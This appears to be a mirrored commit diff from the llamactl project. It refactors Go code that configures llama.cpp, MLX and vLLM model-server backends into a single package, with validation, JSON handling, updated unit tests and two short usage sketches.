Mirror of https://github.com/lordmathis/llamactl.git (synced 2025-11-06 09:04:27 +00:00)

Merge pull request #68 from lordmathis/refactor/backend-options

refactor: Move all backend type switching to backends package
.gitignore (vendored) | 6
@@ -37,3 +37,9 @@ dist/
 __pycache__/
 
 site/
+
+# Dev config
+llamactl.dev.yaml
+
+# Debug files
+__debug*
.vscode/launch.json (vendored) | 2
@@ -12,7 +12,7 @@
             "program": "${workspaceFolder}/cmd/server/main.go",
             "env": {
                 "GO_ENV": "development",
-                "LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false"
+                "LLAMACTL_CONFIG_PATH": "${workspaceFolder}/llamactl.dev.yaml"
             },
         }
     ]
@@ -1,10 +1,251 @@
package backends

import (
    "encoding/json"
    "fmt"
    "llamactl/pkg/config"
    "llamactl/pkg/validation"
    "maps"
)

type BackendType string

const (
    BackendTypeLlamaCpp BackendType = "llama_cpp"
    BackendTypeMlxLm    BackendType = "mlx_lm"
    BackendTypeVllm     BackendType = "vllm"
    // BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion
)

type backend interface {
    BuildCommandArgs() []string
    BuildDockerArgs() []string
    GetPort() int
    SetPort(int)
    GetHost() string
    Validate() error
}

var backendConstructors = map[BackendType]func() backend{
    BackendTypeLlamaCpp: func() backend { return &LlamaServerOptions{} },
    BackendTypeMlxLm:    func() backend { return &MlxServerOptions{} },
    BackendTypeVllm:     func() backend { return &VllmServerOptions{} },
}

type Options struct {
    BackendType    BackendType    `json:"backend_type"`
    BackendOptions map[string]any `json:"backend_options,omitempty"`

    // Backend-specific options
    LlamaServerOptions *LlamaServerOptions `json:"-"`
    MlxServerOptions   *MlxServerOptions   `json:"-"`
    VllmServerOptions  *VllmServerOptions  `json:"-"`
}

func (o *Options) UnmarshalJSON(data []byte) error {
    type Alias Options
    aux := &struct {
        *Alias
    }{
        Alias: (*Alias)(o),
    }

    if err := json.Unmarshal(data, aux); err != nil {
        return err
    }

    // Create backend from constructor map
    if o.BackendOptions != nil {
        constructor, exists := backendConstructors[o.BackendType]
        if !exists {
            return fmt.Errorf("unsupported backend type: %s", o.BackendType)
        }

        backend := constructor()
        optionsData, err := json.Marshal(o.BackendOptions)
        if err != nil {
            return fmt.Errorf("failed to marshal backend options: %w", err)
        }

        if err := json.Unmarshal(optionsData, backend); err != nil {
            return fmt.Errorf("failed to unmarshal backend options: %w", err)
        }

        // Store in the appropriate typed field for backward compatibility
        o.setBackendOptions(backend)
    }

    return nil
}

func (o *Options) MarshalJSON() ([]byte, error) {
    type Alias Options
    aux := &struct {
        *Alias
    }{
        Alias: (*Alias)(o),
    }

    // Get backend and marshal it
    backend := o.getBackend()
    if backend != nil {
        optionsData, err := json.Marshal(backend)
        if err != nil {
            return nil, fmt.Errorf("failed to marshal backend options: %w", err)
        }
        if err := json.Unmarshal(optionsData, &aux.BackendOptions); err != nil {
            return nil, fmt.Errorf("failed to unmarshal backend options to map: %w", err)
        }
    }

    return json.Marshal(aux)
}

// setBackendOptions stores the backend in the appropriate typed field
func (o *Options) setBackendOptions(bcknd backend) {
    switch v := bcknd.(type) {
    case *LlamaServerOptions:
        o.LlamaServerOptions = v
    case *MlxServerOptions:
        o.MlxServerOptions = v
    case *VllmServerOptions:
        o.VllmServerOptions = v
    }
}

func (o *Options) getBackendSettings(backendConfig *config.BackendConfig) *config.BackendSettings {
    switch o.BackendType {
    case BackendTypeLlamaCpp:
        return &backendConfig.LlamaCpp
    case BackendTypeMlxLm:
        return &backendConfig.MLX
    case BackendTypeVllm:
        return &backendConfig.VLLM
    default:
        return nil
    }
}

// getBackend returns the actual backend implementation
func (o *Options) getBackend() backend {
    switch o.BackendType {
    case BackendTypeLlamaCpp:
        return o.LlamaServerOptions
    case BackendTypeMlxLm:
        return o.MlxServerOptions
    case BackendTypeVllm:
        return o.VllmServerOptions
    default:
        return nil
    }
}

func (o *Options) isDockerEnabled(backend *config.BackendSettings) bool {
    if backend.Docker != nil && backend.Docker.Enabled && o.BackendType != BackendTypeMlxLm {
        return true
    }
    return false
}

func (o *Options) IsDockerEnabled(backendConfig *config.BackendConfig) bool {
    backendSettings := o.getBackendSettings(backendConfig)
    return o.isDockerEnabled(backendSettings)
}

// GetCommand builds the command to run the backend
func (o *Options) GetCommand(backendConfig *config.BackendConfig) string {

    backendSettings := o.getBackendSettings(backendConfig)

    if o.isDockerEnabled(backendSettings) {
        return "docker"
    }

    return backendSettings.Command
}

// buildCommandArgs builds command line arguments for the backend
func (o *Options) BuildCommandArgs(backendConfig *config.BackendConfig) []string {

    var args []string

    backendSettings := o.getBackendSettings(backendConfig)
    backend := o.getBackend()
    if backend == nil {
        return args
    }

    if o.isDockerEnabled(backendSettings) {
        // For Docker, start with Docker args
        args = append(args, backendSettings.Docker.Args...)
        args = append(args, backendSettings.Docker.Image)
        args = append(args, backend.BuildDockerArgs()...)

    } else {
        // For native execution, start with backend args
        args = append(args, backendSettings.Args...)
        args = append(args, backend.BuildCommandArgs()...)
    }

    return args
}

// BuildEnvironment builds the environment variables for the backend process
func (o *Options) BuildEnvironment(backendConfig *config.BackendConfig, environment map[string]string) map[string]string {

    backendSettings := o.getBackendSettings(backendConfig)
    env := map[string]string{}

    if backendSettings.Environment != nil {
        maps.Copy(env, backendSettings.Environment)
    }

    if o.isDockerEnabled(backendSettings) {
        if backendSettings.Docker.Environment != nil {
            maps.Copy(env, backendSettings.Docker.Environment)
        }
    }

    if environment != nil {
        maps.Copy(env, environment)
    }

    return env
}

func (o *Options) GetPort() int {
    backend := o.getBackend()
    if backend != nil {
        return backend.GetPort()
    }
    return 0
}

func (o *Options) SetPort(port int) {
    backend := o.getBackend()
    if backend != nil {
        backend.SetPort(port)
    }
}

func (o *Options) GetHost() string {
    backend := o.getBackend()
    if backend != nil {
        return backend.GetHost()
    }
    return "localhost"
}

func (o *Options) GetResponseHeaders(backendConfig *config.BackendConfig) map[string]string {
    backendSettings := o.getBackendSettings(backendConfig)
    return backendSettings.ResponseHeaders
}

// ValidateInstanceOptions performs validation based on backend type
func (o *Options) ValidateInstanceOptions() error {
    backend := o.getBackend()
    if backend == nil {
        return validation.ValidationError(fmt.Errorf("backend options cannot be nil for backend type %s", o.BackendType))
    }

    return backend.Validate()
}
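As a usage sketch of the Options wrapper above: the JSON round-trip goes through the constructor map, so the typed field is populated on unmarshal and flattened back into backend_options on marshal. A minimal example, assuming the package layout introduced by this refactor; the payload values and model path are illustrative.

package main

import (
    "encoding/json"
    "fmt"
    "log"

    "llamactl/pkg/backends"
)

func main() {
    payload := []byte(`{
        "backend_type": "llama_cpp",
        "backend_options": {"model": "/models/example.gguf", "port": 8080}
    }`)

    var opts backends.Options
    if err := json.Unmarshal(payload, &opts); err != nil {
        log.Fatal(err)
    }

    // UnmarshalJSON routed backend_options into the typed field.
    fmt.Println(opts.LlamaServerOptions.Model, opts.GetPort())

    // MarshalJSON flattens the typed options back into backend_options.
    out, err := json.Marshal(&opts)
    if err != nil {
        log.Fatal(err)
    }
    fmt.Println(string(out))
}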
@@ -1,15 +1,16 @@
|
||||
package llamacpp
|
||||
package backends
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"llamactl/pkg/backends"
|
||||
"fmt"
|
||||
"llamactl/pkg/validation"
|
||||
"reflect"
|
||||
"strconv"
|
||||
)
|
||||
|
||||
// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
||||
// llamaMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated
|
||||
// Used for both parsing (with underscores) and building (with dashes)
|
||||
var multiValuedFlags = map[string]bool{
|
||||
var llamaMultiValuedFlags = map[string]bool{
|
||||
// Parsing keys (with underscores)
|
||||
"override_tensor": true,
|
||||
"override_kv": true,
|
||||
@@ -335,11 +336,41 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func (o *LlamaServerOptions) GetPort() int {
|
||||
return o.Port
|
||||
}
|
||||
|
||||
func (o *LlamaServerOptions) SetPort(port int) {
|
||||
o.Port = port
|
||||
}
|
||||
|
||||
func (o *LlamaServerOptions) GetHost() string {
|
||||
return o.Host
|
||||
}
|
||||
|
||||
func (o *LlamaServerOptions) Validate() error {
|
||||
if o == nil {
|
||||
return validation.ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend"))
|
||||
}
|
||||
|
||||
// Use reflection to check all string fields for injection patterns
|
||||
if err := validation.ValidateStructStrings(o, ""); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Basic network validation for port
|
||||
if o.Port < 0 || o.Port > 65535 {
|
||||
return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// BuildCommandArgs converts InstanceOptions to command line arguments
|
||||
func (o *LlamaServerOptions) BuildCommandArgs() []string {
|
||||
// Llama uses multiple flags for arrays by default (not comma-separated)
|
||||
// Use package-level multiValuedFlags variable
|
||||
return backends.BuildCommandArgs(o, multiValuedFlags)
|
||||
// Use package-level llamaMultiValuedFlags variable
|
||||
return BuildCommandArgs(o, llamaMultiValuedFlags)
|
||||
}
|
||||
|
||||
func (o *LlamaServerOptions) BuildDockerArgs() []string {
|
||||
@@ -356,10 +387,10 @@ func (o *LlamaServerOptions) BuildDockerArgs() []string {
|
||||
func ParseLlamaCommand(command string) (*LlamaServerOptions, error) {
|
||||
executableNames := []string{"llama-server"}
|
||||
var subcommandNames []string // Llama has no subcommands
|
||||
// Use package-level multiValuedFlags variable
|
||||
// Use package-level llamaMultiValuedFlags variable
|
||||
|
||||
var llamaOptions LlamaServerOptions
|
||||
if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil {
|
||||
if err := ParseCommand(command, executableNames, subcommandNames, llamaMultiValuedFlags, &llamaOptions); err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
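A short sketch of the relocated parser in use, assuming the function and method names shown above; the command string is illustrative.

package main

import (
    "fmt"
    "log"

    "llamactl/pkg/backends"
)

func main() {
    opts, err := backends.ParseLlamaCommand("llama-server --model /models/example.gguf --gpu-layers 32 --verbose")
    if err != nil {
        log.Fatal(err)
    }
    // BuildCommandArgs regenerates the flag list from the parsed options.
    fmt.Println(opts.BuildCommandArgs())
}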
@@ -1,71 +1,38 @@
|
||||
package llamacpp_test
|
||||
package backends_test
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/backends"
|
||||
"llamactl/pkg/testutil"
|
||||
"reflect"
|
||||
"slices"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
Host: "localhost",
|
||||
Verbose: true,
|
||||
CtxSize: 4096,
|
||||
GPULayers: 32,
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check individual arguments
|
||||
expectedPairs := map[string]string{
|
||||
"--model": "/path/to/model.gguf",
|
||||
"--port": "8080",
|
||||
"--host": "localhost",
|
||||
"--ctx-size": "4096",
|
||||
"--gpu-layers": "32",
|
||||
}
|
||||
|
||||
for flag, expectedValue := range expectedPairs {
|
||||
if !containsFlagWithValue(args, flag, expectedValue) {
|
||||
t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
|
||||
}
|
||||
}
|
||||
|
||||
// Check standalone boolean flag
|
||||
if !contains(args, "--verbose") {
|
||||
t.Errorf("Expected --verbose flag not found in %v", args)
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
func TestLlamaCppBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
options llamacpp.LlamaServerOptions
|
||||
options backends.LlamaServerOptions
|
||||
expected []string
|
||||
excluded []string
|
||||
}{
|
||||
{
|
||||
name: "verbose true",
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
options: backends.LlamaServerOptions{
|
||||
Verbose: true,
|
||||
},
|
||||
expected: []string{"--verbose"},
|
||||
},
|
||||
{
|
||||
name: "verbose false",
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
options: backends.LlamaServerOptions{
|
||||
Verbose: false,
|
||||
},
|
||||
excluded: []string{"--verbose"},
|
||||
},
|
||||
{
|
||||
name: "multiple booleans",
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
options: backends.LlamaServerOptions{
|
||||
Verbose: true,
|
||||
FlashAttn: true,
|
||||
Mlock: false,
|
||||
@@ -81,13 +48,13 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
args := tt.options.BuildCommandArgs()
|
||||
|
||||
for _, expectedArg := range tt.expected {
|
||||
if !contains(args, expectedArg) {
|
||||
if !testutil.Contains(args, expectedArg) {
|
||||
t.Errorf("Expected argument %q not found in %v", expectedArg, args)
|
||||
}
|
||||
}
|
||||
|
||||
for _, excludedArg := range tt.excluded {
|
||||
if contains(args, excludedArg) {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Excluded argument %q found in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
@@ -95,38 +62,8 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Port: 8080,
|
||||
Threads: 4,
|
||||
CtxSize: 2048,
|
||||
GPULayers: 16,
|
||||
Temperature: 0.7,
|
||||
TopK: 40,
|
||||
TopP: 0.9,
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
expectedPairs := map[string]string{
|
||||
"--port": "8080",
|
||||
"--threads": "4",
|
||||
"--ctx-size": "2048",
|
||||
"--gpu-layers": "16",
|
||||
"--temp": "0.7",
|
||||
"--top-k": "40",
|
||||
"--top-p": "0.9",
|
||||
}
|
||||
|
||||
for flag, expectedValue := range expectedPairs {
|
||||
if !containsFlagWithValue(args, flag, expectedValue) {
|
||||
t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
func TestLlamaCppBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
options := backends.LlamaServerOptions{
|
||||
Port: 0, // Should be excluded
|
||||
Threads: 0, // Should be excluded
|
||||
Temperature: 0, // Should be excluded
|
||||
@@ -146,14 +83,14 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
}
|
||||
|
||||
for _, excludedArg := range excludedArgs {
|
||||
if contains(args, excludedArg) {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
func TestLlamaCppBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
options := backends.LlamaServerOptions{
|
||||
Lora: []string{"adapter1.bin", "adapter2.bin"},
|
||||
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
|
||||
DrySequenceBreaker: []string{".", "!", "?"},
|
||||
@@ -170,15 +107,15 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
|
||||
for flag, values := range expectedOccurrences {
|
||||
for _, value := range values {
|
||||
if !containsFlagWithValue(args, flag, value) {
|
||||
if !testutil.ContainsFlagWithValue(args, flag, value) {
|
||||
t.Errorf("Expected %s %s, not found in %v", flag, value, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
func TestLlamaCppBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
options := backends.LlamaServerOptions{
|
||||
Lora: []string{}, // Empty array should not generate args
|
||||
OverrideTensor: []string{}, // Empty array should not generate args
|
||||
}
|
||||
@@ -187,43 +124,13 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
|
||||
excludedArgs := []string{"--lora", "--override-tensor"}
|
||||
for _, excludedArg := range excludedArgs {
|
||||
if contains(args, excludedArg) {
|
||||
if testutil.Contains(args, excludedArg) {
|
||||
t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
|
||||
// Test snake_case to kebab-case conversion
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
CtxSize: 4096,
|
||||
GPULayers: 32,
|
||||
ThreadsBatch: 2,
|
||||
FlashAttn: true,
|
||||
TopK: 40,
|
||||
TopP: 0.9,
|
||||
}
|
||||
|
||||
args := options.BuildCommandArgs()
|
||||
|
||||
// Check that field names are properly converted
|
||||
expectedFlags := []string{
|
||||
"--ctx-size", // ctx_size -> ctx-size
|
||||
"--gpu-layers", // gpu_layers -> gpu-layers
|
||||
"--threads-batch", // threads_batch -> threads-batch
|
||||
"--flash-attn", // flash_attn -> flash-attn
|
||||
"--top-k", // top_k -> top-k
|
||||
"--top-p", // top_p -> top-p
|
||||
}
|
||||
|
||||
for _, flag := range expectedFlags {
|
||||
if !contains(args, flag) {
|
||||
t.Errorf("Expected flag %q not found in %v", flag, args)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
||||
func TestLlamaCppUnmarshalJSON_StandardFields(t *testing.T) {
|
||||
jsonData := `{
|
||||
"model": "/path/to/model.gguf",
|
||||
"port": 8080,
|
||||
@@ -234,7 +141,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
||||
"temp": 0.7
|
||||
}`
|
||||
|
||||
var options llamacpp.LlamaServerOptions
|
||||
var options backends.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -263,16 +170,16 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
func TestLlamaCppUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
jsonData string
|
||||
checkFn func(llamacpp.LlamaServerOptions) error
|
||||
checkFn func(backends.LlamaServerOptions) error
|
||||
}{
|
||||
{
|
||||
name: "threads alternatives",
|
||||
jsonData: `{"t": 4, "tb": 2}`,
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||
if opts.Threads != 4 {
|
||||
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
|
||||
}
|
||||
@@ -285,7 +192,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "context size alternatives",
|
||||
jsonData: `{"c": 2048}`,
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||
if opts.CtxSize != 2048 {
|
||||
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
|
||||
}
|
||||
@@ -295,7 +202,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "gpu layers alternatives",
|
||||
jsonData: `{"ngl": 16}`,
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||
if opts.GPULayers != 16 {
|
||||
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
||||
}
|
||||
@@ -305,7 +212,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "model alternatives",
|
||||
jsonData: `{"m": "/path/model.gguf"}`,
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||
if opts.Model != "/path/model.gguf" {
|
||||
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
|
||||
}
|
||||
@@ -315,7 +222,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "temperature alternatives",
|
||||
jsonData: `{"temp": 0.8}`,
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
checkFn: func(opts backends.LlamaServerOptions) error {
|
||||
if opts.Temperature != 0.8 {
|
||||
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
|
||||
}
|
||||
@@ -326,7 +233,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
var options llamacpp.LlamaServerOptions
|
||||
var options backends.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(tt.jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -339,24 +246,24 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
}
|
||||
}
|
||||
|
||||
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
|
||||
func TestLlamaCppUnmarshalJSON_InvalidJSON(t *testing.T) {
|
||||
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
|
||||
|
||||
var options llamacpp.LlamaServerOptions
|
||||
var options backends.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(invalidJSON), &options)
|
||||
if err == nil {
|
||||
t.Error("Expected error for invalid JSON")
|
||||
}
|
||||
}
|
||||
|
||||
func TestUnmarshalJSON_ArrayFields(t *testing.T) {
|
||||
func TestLlamaCppUnmarshalJSON_ArrayFields(t *testing.T) {
|
||||
jsonData := `{
|
||||
"lora": ["adapter1.bin", "adapter2.bin"],
|
||||
"override_tensor": ["tensor1", "tensor2"],
|
||||
"dry_sequence_breaker": [".", "!", "?"]
|
||||
}`
|
||||
|
||||
var options llamacpp.LlamaServerOptions
|
||||
var options backends.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -383,26 +290,81 @@ func TestParseLlamaCommand(t *testing.T) {
|
||||
name string
|
||||
command string
|
||||
expectErr bool
|
||||
validate func(*testing.T, *backends.LlamaServerOptions)
|
||||
}{
|
||||
{
|
||||
name: "basic command",
|
||||
command: "llama-server --model /path/to/model.gguf --gpu-layers 32",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
|
||||
if opts.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.GPULayers != 32 {
|
||||
t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "args only",
|
||||
command: "--model /path/to/model.gguf --ctx-size 4096",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
|
||||
if opts.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.CtxSize != 4096 {
|
||||
t.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "mixed flag formats",
|
||||
command: "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
|
||||
if opts.Model != "/path/model.gguf" {
|
||||
t.Errorf("expected model '/path/model.gguf', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.GPULayers != 16 {
|
||||
t.Errorf("expected gpu_layers 16, got %d", opts.GPULayers)
|
||||
}
|
||||
if !opts.Verbose {
|
||||
t.Errorf("expected verbose to be true")
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "quoted strings",
|
||||
command: `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`,
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
|
||||
if opts.APIKey != "sk-1234567890abcdef" {
|
||||
t.Errorf("expected api_key 'sk-1234567890abcdef', got '%s'", opts.APIKey)
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "multiple value types",
|
||||
command: "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap",
|
||||
expectErr: false,
|
||||
validate: func(t *testing.T, opts *backends.LlamaServerOptions) {
|
||||
if opts.Model != "/test/model.gguf" {
|
||||
t.Errorf("expected model '/test/model.gguf', got '%s'", opts.Model)
|
||||
}
|
||||
if opts.GPULayers != 32 {
|
||||
t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
||||
}
|
||||
if opts.Temperature != 0.7 {
|
||||
t.Errorf("expected temperature 0.7, got %f", opts.Temperature)
|
||||
}
|
||||
if !opts.Verbose {
|
||||
t.Errorf("expected verbose to be true")
|
||||
}
|
||||
if !opts.NoMmap {
|
||||
t.Errorf("expected no_mmap to be true")
|
||||
}
|
||||
},
|
||||
},
|
||||
{
|
||||
name: "empty command",
|
||||
@@ -423,7 +385,7 @@ func TestParseLlamaCommand(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result, err := llamacpp.ParseLlamaCommand(tt.command)
|
||||
result, err := backends.ParseLlamaCommand(tt.command)
|
||||
|
||||
if tt.expectErr {
|
||||
if err == nil {
|
||||
@@ -439,43 +401,19 @@ func TestParseLlamaCommand(t *testing.T) {
|
||||
|
||||
if result == nil {
|
||||
t.Errorf("expected result but got nil")
|
||||
return
|
||||
}
|
||||
|
||||
if tt.validate != nil {
|
||||
tt.validate(t, result)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseLlamaCommandValues(t *testing.T) {
|
||||
command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap"
|
||||
result, err := llamacpp.ParseLlamaCommand(command)
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
|
||||
if result.Model != "/test/model.gguf" {
|
||||
t.Errorf("expected model '/test/model.gguf', got '%s'", result.Model)
|
||||
}
|
||||
|
||||
if result.GPULayers != 32 {
|
||||
t.Errorf("expected gpu_layers 32, got %d", result.GPULayers)
|
||||
}
|
||||
|
||||
if result.Temperature != 0.7 {
|
||||
t.Errorf("expected temperature 0.7, got %f", result.Temperature)
|
||||
}
|
||||
|
||||
if !result.Verbose {
|
||||
t.Errorf("expected verbose to be true")
|
||||
}
|
||||
|
||||
if !result.NoMmap {
|
||||
t.Errorf("expected no_mmap to be true")
|
||||
}
|
||||
}
|
||||
|
||||
func TestParseLlamaCommandArrays(t *testing.T) {
|
||||
command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin"
|
||||
result, err := llamacpp.ParseLlamaCommand(command)
|
||||
result, err := backends.ParseLlamaCommand(command)
|
||||
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
@@ -492,20 +430,3 @@ func TestParseLlamaCommandArrays(t *testing.T) {
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Helper functions
|
||||
func contains(slice []string, item string) bool {
|
||||
return slices.Contains(slice, item)
|
||||
}
|
||||
|
||||
func containsFlagWithValue(args []string, flag, value string) bool {
|
||||
for i, arg := range args {
|
||||
if arg == flag {
|
||||
// Check if there's a next argument and it matches the expected value
|
||||
if i+1 < len(args) && args[i+1] == value {
|
||||
return true
|
||||
}
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
@@ -1,7 +1,8 @@
|
||||
package mlx
|
||||
package backends
|
||||
|
||||
import (
|
||||
"llamactl/pkg/backends"
|
||||
"fmt"
|
||||
"llamactl/pkg/validation"
|
||||
)
|
||||
|
||||
type MlxServerOptions struct {
|
||||
@@ -30,10 +31,43 @@ type MlxServerOptions struct {
|
||||
MaxTokens int `json:"max_tokens,omitempty"`
|
||||
}
|
||||
|
||||
func (o *MlxServerOptions) GetPort() int {
|
||||
return o.Port
|
||||
}
|
||||
|
||||
func (o *MlxServerOptions) SetPort(port int) {
|
||||
o.Port = port
|
||||
}
|
||||
|
||||
func (o *MlxServerOptions) GetHost() string {
|
||||
return o.Host
|
||||
}
|
||||
|
||||
func (o *MlxServerOptions) Validate() error {
|
||||
if o == nil {
|
||||
return validation.ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend"))
|
||||
}
|
||||
|
||||
if err := validation.ValidateStructStrings(o, ""); err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
// Basic network validation for port
|
||||
if o.Port < 0 || o.Port > 65535 {
|
||||
return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port))
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// BuildCommandArgs converts to command line arguments
|
||||
func (o *MlxServerOptions) BuildCommandArgs() []string {
|
||||
multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields
|
||||
